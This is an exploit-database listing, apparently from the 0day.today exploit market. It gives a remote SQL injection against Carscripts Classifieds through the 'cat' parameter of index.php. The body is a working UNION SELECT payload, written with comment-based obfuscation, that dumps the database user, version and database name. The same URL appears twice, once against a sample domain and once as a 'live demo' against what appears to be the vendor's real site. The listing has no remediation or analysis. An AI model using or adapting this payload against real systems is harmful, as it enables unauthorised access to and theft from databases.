[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability

Author
Stack
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3218
Category
web applications
Date add
17-06-2008
Platform
unsorted
=========================================================================
Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability
=========================================================================


Carscripts Classifieds Sql INjection

By Stack
###########################################
[+] : you can see the Result in 'Title'
[+] : Open the source page to see the result
###########################################
poc : http://site.co.il/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*

live demo
http://www.carscripts.com/cars/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*



#  0day.today [2024-11-15]  #